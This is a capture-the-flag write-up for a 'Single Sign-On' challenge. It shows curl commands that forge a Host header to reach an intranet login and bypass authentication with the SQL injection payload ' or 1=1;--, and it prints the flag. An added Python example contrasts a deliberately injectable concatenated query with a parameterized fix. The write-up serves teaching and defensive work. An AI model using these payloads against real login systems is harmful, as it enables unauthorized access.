Single Sign-On

🧠 Challenge Text

Hi, emergency troubleshooter,

we are preparing a new interface for the single sign-on system, which, on the recommendation of external pentesters, is now also protected by a WAF. Test the system to ensure it is secure.

Stay grounded!

http://login.powergrid.tcc:8080

🔍 Hints Text

1. A WAF was probably just added in front of the old system.

🎨 Solution

Requesting the URL directly redirects us to the non-existent host intranet.powergrid.tcc:

$ curl -L 'http://login.powergrid.tcc:8080/index.php'
curl: (6) Could not resolve host: intranet.powergrid.tcc

Let's try to pretend we came from the intranet by setting the Host header:

$ curl -L 'http://login.powergrid.tcc:8080/index.php' -H 'Host: intranet.powergrid.tcc:8080'

After trying different injection payloads, the SQL injection login=' or 1=1;-- did the job: the expression is always true, so the password does not matter.

$ curl -L 'http://login.powergrid.tcc:8080/index.php' -X POST -H 'Host: intranet.powergrid.tcc:8080' --data-raw 'login=%27+or+1%3D1%3B-+-&password=x&padding='
...
FLAG{rxRk-Dj3A-bGc0-cyHc}
...
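
Why the always-true login value works regardless of the password, and why the fix belongs in the query rather than in the WAF, shown as an added example. This is not the challenge's code: the backend is not shown on the page, so the `users` table, the function names and the use of SQLite are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data; the real schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    # Plaintext password only to keep the example short.
    db.execute("INSERT INTO users VALUES ('operator', 's3cret-constructed')")
    return db


def login_concat(db, login, password):
    """Assumed 'before' form: user input is pasted into the SQL text."""
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL is treated as a failed login


def login_param(db, login, password):
    """Hardened form: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None


def compare(login, password):
    """Return (concat_result, param_result) for the same credentials."""
    db = make_db()
    return login_concat(db, login, password), login_param(db, login, password)


if __name__ == "__main__":
    # The login value from the write-up: the quote closes the string literal,
    # "or 1=1" matches every row, and "--" comments out the password check.
    print(compare("' or 1=1;--", "x"))
    print(compare("operator", "s3cret-constructed"))
    print(compare("operator", "wrong"))
```

With the parameterized query the same login value is compared as a literal string and matches no user, so the result no longer depends on what a filter in front of the application lets through.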